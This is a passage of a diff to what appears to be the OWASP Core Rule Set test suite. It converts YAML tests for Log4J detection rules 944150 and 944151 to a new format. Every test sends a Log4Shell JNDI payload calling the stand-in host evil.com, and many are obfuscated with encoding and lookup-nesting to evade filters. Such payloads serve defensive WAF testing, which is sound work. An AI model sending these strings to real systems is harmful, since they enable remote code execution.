data: - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: 
application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: 
POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": 
"$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 14 desc: Log4J exploit on JSON with numeric 
HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-17 + - input: + dest_addr: "127.0.0.1" + 
headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL 
encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-22 + - input: + 
dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: 
"*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml index 71a8e02..f056fae 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml 
@@ -1,456 +1,454 @@ --- -# NOTE: Please keep these tests in sync with 944151.yaml. -# 944151 should detect the same things as 944151. +# NOTE: Please keep these tests in sync with 944150.yaml and 944152.yaml. +# 944151 should detect the same things as 944150 and 944152. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944151.yaml" - description: "Description" +rule_id: 944151 tests: - - test_title: 944151-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - 
data: - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: 
application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: 
POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": 
"$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 14 desc: Log4J exploit on JSON with numeric 
HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-17 + - input: + dest_addr: "127.0.0.1" + 
headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + 